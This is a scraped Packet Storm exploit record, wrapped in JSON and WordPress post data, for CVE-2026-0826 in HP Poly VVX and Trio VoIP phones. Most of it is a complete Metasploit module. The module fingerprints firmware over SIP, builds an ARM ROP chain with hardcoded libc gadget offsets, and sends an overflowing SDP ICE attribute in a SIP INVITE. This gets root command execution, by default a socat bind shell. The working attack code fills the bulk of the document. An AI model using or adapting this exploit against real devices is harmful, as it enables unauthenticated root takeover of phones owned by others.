{“lastseen”:”2026-06-20T03:52:39″,”description”:”CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting all models in the VVX series VVX 150, VVX 250, VVX 350, and VVX 450, as well as three models from the Trio IP Conference series Trio 8800, Trio 8500, and…”,”published”:”2026-06-19T00:00:00″,”modified”:”2026-06-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HP Poly Voice Unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:223892″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0826″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = GreatRanking\\n \\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::Udp\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘HP Poly Voice Unauthenticated Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting all\\n models in the VVX series (VVX 150, VVX 250, VVX 350, and VVX 450), as well as three models from the Trio IP\\n Conference series (Trio 8800, Trio 8500, and Trio 8300). A remote attacker can leverage CVE-2026-0826 to achieve\\n unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability is present\\n in the device’s parsing of Session Description Protocol (SDP) attributes for Interactive Connectivity Establishment\\n (ICE). The ICE feature, which is not enabled by default, must be enabled for the device to be exploitable by a\\n remote attacker.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘sfewer-r7’, # Discovery, Analysis, Exploit\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-0826’],\\n [‘URL’, ‘https:\/\/support.hp.com\/us-en\/document\/ish_15052661-15052687-16\/hpsbpy04083’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed\/’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-06-01’,\\n # While the target is an embedded Linux system, there is no curl\/wget\/ftp for the command payloads, so we\\n # only expose the Unix payloads. Only the socat payloads have been tested to work.\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Privileged’ =\\u003e true, # \/usr\/local\/root\/polyapp runs as root\\n ‘Targets’ =\\u003e [\\n [ ‘Automatic’, {} ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n # NOTE: Tested with the following payloads:\\n # cmd\/unix\/bind_socat_tcp\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 5060,\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/bind_socat_tcp’,\\n ‘SocatPath’ =\\u003e ‘\/usr\/local\/bin\/socat’,\\n ‘BashPath’ =\\u003e ‘\/bin\/sh’\\n },\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e \\”\\\\r\\\\n\\\\0 \\”,\\n ‘Encoder’ =\\u003e ‘cmd\/ifs’\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_OS_RESTARTS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n end\\n \\n def check\\n connect_udp\\n \\n sip_response, model_str, version_str = get_version\\n \\n unless sip_response.nil? || model_str.nil? || version_str.nil?\\n \\n version = Rex::Version.new(version_str)\\n \\n description = \\”Poly #{model_str} version #{version_str}\\”\\n \\n # Per the vendor advisory, every model in the VVX family is vulnerable, and three models in the Trio family\\n # are vulnerable. The fixed firmware version is also given here.\\n affected_ranges = [\\n { family: ‘vvx’, model: nil, fixed_version: ‘6.4.8’ },\\n { family: ‘trio’, model: ‘8300’, fixed_version: ‘8.1.7’ },\\n { family: ‘trio’, model: ‘8500’, fixed_version: ‘7.2.8’ },\\n { family: ‘trio’, model: ‘8800’, fixed_version: ‘7.2.8’ },\\n ]\\n \\n affected_ranges.each do |affected_range|\\n next unless model_str.downcase.include?(affected_range[:family])\\n \\n next if (affected_range[:model]) \\u0026\\u0026 !model_str.downcase.include?(affected_range[:model])\\n \\n next unless version \\u003c Rex::Version.new(affected_range[:fixed_version])\\n \\n # NOTE: When we use \\”Require: ice\\” in the request, we get a \\”420 Bad Extension\\” response if ICE is enabled\\n # but not fully configured. The phone will still be exploitable.\\n \\n if sip_response.start_with? \\”SIP\/2.0 200 OK\\\\r\\\\n\\”\\n return Exploit::CheckCode::Appears(description)\\n end\\n \\n return Exploit::CheckCode::Detected(description)\\n end\\n \\n return Exploit::CheckCode::Safe(description)\\n end\\n \\n CheckCode::Unknown\\n ensure\\n disconnect_udp\\n end\\n \\n def exploit\\n connect_udp\\n \\n cmd = payload.encoded.to_s\\n \\n unless datastore[‘PAYLOAD’] == ‘cmd\/unix\/bind_socat_tcp’\\n print_warning(‘Only the unix socat payload cmd\/unix\/bind_socat_tcp has been verified to work’)\\n end\\n \\n vprint_status(\\”cmd: #{cmd}\\”)\\n \\n _, model_str, version_str = get_version\\n \\n fail_with(Failure::UnexpectedReply, ‘Failed to get target version’) unless version_str \\u0026\\u0026 model_str\\n \\n rop_table = nil\\n \\n if model_str.downcase.include? ‘vvx’\\n rop_table = get_vvx_rop_table(version_str)\\n else\\n fail_with(Failure::BadConfig, \\”No ROP table available for model #{model_str}\\”)\\n end\\n \\n fail_with(Failure::BadConfig, \\”No ROP table available for #{model_str} version #{version_str}\\”) unless rop_table\\n \\n vprint_status(\\”ROP Table: #{rop_table}\\”)\\n \\n # we use system() which will do \\”\/bin\/sh -c \\u003cCMD\\u003e\\” for us.\\n \\n attribute_name = ‘a=candidate:’\\n \\n overflow = attribute_name\\n overflow += ‘A’ * (256 – attribute_name.length) # fill the 256 byte stack buffer\\n overflow += ‘B’ * 19 # padding\\n overflow += ‘1111’ # r4\\n overflow += ‘2222’ # r5\\n overflow += ‘3333’ # r11\\n # .text:40A71454 POP {PC}\\n overflow += [rop_table[:libc_base] + rop_table[:libc_gadget1]].pack(‘V’) # pc #1 – align stack (otherwise we are off by 4 and libc!fork will SIGSEGV during libc!system)\\n # .text:40B57C0C POP {R0-R3,PC}\\n overflow += [rop_table[:libc_base] + rop_table[:libc_gadget2]].pack(‘V’) # pc #2 – set r3 to libc!system\\n overflow += ‘CCCC’ # r0\\n overflow += ‘CCCC’ # r1\\n overflow += ‘CCCC’ # r2\\n overflow += [rop_table[:libc_base] + rop_table[:libc_system]].pack(‘V’) # r3 – # .text:40A939C8 ; int __fastcall system(char *cmd)\\n # .text:40B41BF4 MOV R0, SP\\n # .text:40B41BF8 BLX R3\\n overflow += [rop_table[:libc_base] + rop_table[:libc_gadget4]].pack(‘V’) # pc #3 – set r0 == cmd, and call system(cmd)\\n overflow += cmd # \\u0026sp\\n \\n _, udp_lhost, udp_lport = udp_sock.getlocalname\\n \\n sdp_data = \\”c=IN IP4 #{udp_lhost}\\\\r\\\\n\\”\\n sdp_data += \\”m=audio #{rand(50_000..50_999)} RTP\/AVP 0\\\\r\\\\n\\”\\n sdp_data += \\”a=rtpmap:0 PCMU\/8000\/1\\\\r\\\\n\\”\\n sdp_data += \\”#{overflow}\\\\r\\\\n\\”\\n \\n call_id = Rex::Text.rand_text_hex(16)\\n \\n cseq = rand(65_535)\\n \\n sip_request = \\”INVITE sip:#{rhost}:#{rport} SIP\/2.0\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Via: SIP\/2.0\/UDP #{udp_lhost}:#{udp_lport}\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Route: \\u003csip:#{udp_lhost}:#{udp_lport};lr\\u003e\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”From: \\u003csip:#{rhost}:#{rport}\\u003e\\\\r\\\\n\\” # The From is the target ip, as this can appear in the UI as a missed call.\\n sip_request \\u003c\\u003c \\”To: \\u003csip:#{rhost}:#{rport}\\u003e\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Contact: \\u003csip:#{rhost}\\u003e\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Call-ID: #{call_id}\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”CSeq: #{cseq} INVITE\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Content-Type: application\/sdp\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Content-Length: #{sdp_data.bytesize}\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c sdp_data\\n \\n udp_sock.put(sip_request)\\n ensure\\n disconnect_udp\\n end\\n \\n def get_version\\n # Cache the response for the scenario where exploit is run with AutoCheck true. This avoids a second SIP OPTIONS\\n # request being sent to the target.\\n @get_version ||= _get_version\\n end\\n \\n def _get_version\\n _, udp_lhost, udp_lport = udp_sock.getlocalname\\n \\n sip_request = \\”OPTIONS sip:#{rhost}:#{rport} SIP\/2.0\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Via: SIP\/2.0\/UDP #{udp_lhost}:#{udp_lport}\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”From: \\u003csip:#{udp_lhost}:#{udp_lport}\\u003e\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”To: \\u003csip:#{rhost}:#{rport}\\u003e\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”CSeq: #{rand(65_535)} OPTIONS\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”Call-ID: #{Rex::Text.rand_text_hex(16)}\\\\r\\\\n\\”\\n # The vuln is in a non-default service for Interactive Connectivity Establishment (ICE). We use the Require header\\n # to ask the target if it supports ICE.\\n sip_request \\u003c\\u003c \\”Require: ice\\\\r\\\\n\\”\\n sip_request \\u003c\\u003c \\”\\\\r\\\\n\\”\\n \\n udp_sock.put(sip_request)\\n \\n sip_response = udp_sock.get(udp_sock.def_read_timeout)\\n \\n unless sip_response.empty?\\n # HP Poly VVX devices are vulnerable.\\n # Example user agent string: \\”User-Agent: PolycomVVX-VVX_450-UA\/6.4.7.4477\\”\\n if sip_response =~ %r{User-Agent:\\\\s*PolycomVVX-(VVX_\\\\d+)-UA\/([\\\\d+.]+)}i\\n return sip_response, Regexp.last_match(1), Regexp.last_match(2)\\n end\\n \\n # HP Poly Trio devices are vulnerable also, Recog has a regex and example values for these:\\n # https:\/\/github.com\/rapid7\/recog\/blob\/d6b0ee8b5272198c0d2e38d78999836c821f0934\/xml\/sip_banners.xml#L763C25-L763C112\\n # Example user agent string: \\”User-Agent: PolycomRealPresenceTrio-Trio_8800-UA\/5.4.0.12197\\”\\n if sip_response =~ %r{User-Agent:\\\\s*(?:Polycom\/[\\\\d.]+ )?PolycomRealPresenceTrio-(Trio_\\\\S+)-UA\/([\\\\d.]+)(?:_(.{12}))?}\\n return sip_response, Regexp.last_match(1), Regexp.last_match(2)\\n end\\n \\n end\\n \\n [nil, nil, nil]\\n end\\n \\n def get_vvx_rop_table(version_str)\\n rop_tables = {\\n ‘6.4.7.4477’ =\\u003e {\\n # Even though \/proc\/sys\/kernel\/randomize_va_space is 1, all libraries are\\n # mapped from 0x40000000, and libc ends up here.\\n libc_base: 0x40A5C000,\\n # .text:40A71454 POP {PC}\\n libc_gadget1: 0x15454,\\n # .text:40B57C0C POP {R0-R3,PC}\\n libc_gadget2: 0xFBC0C,\\n # .text:40A939C8 ; int __fastcall system(char *cmd)\\n libc_system: 0x379C8,\\n # .text:40B41BF4 MOV R0, SP\\n # .text:40B41BF8 BLX R3\\n libc_gadget4: 0xE5BF4\\n }\\n }\\n \\n rop_tables[version_str]\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223892″,”cvss”:{“score”:9.2,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:P\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223892\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-20T03:52:39″,”description”:”CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting all models in the VVX series VVX 150, VVX 250, VVX 350, and VVX 450,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,42,12,13,53,7,11,5],"class_list":["post-64500","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-92","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n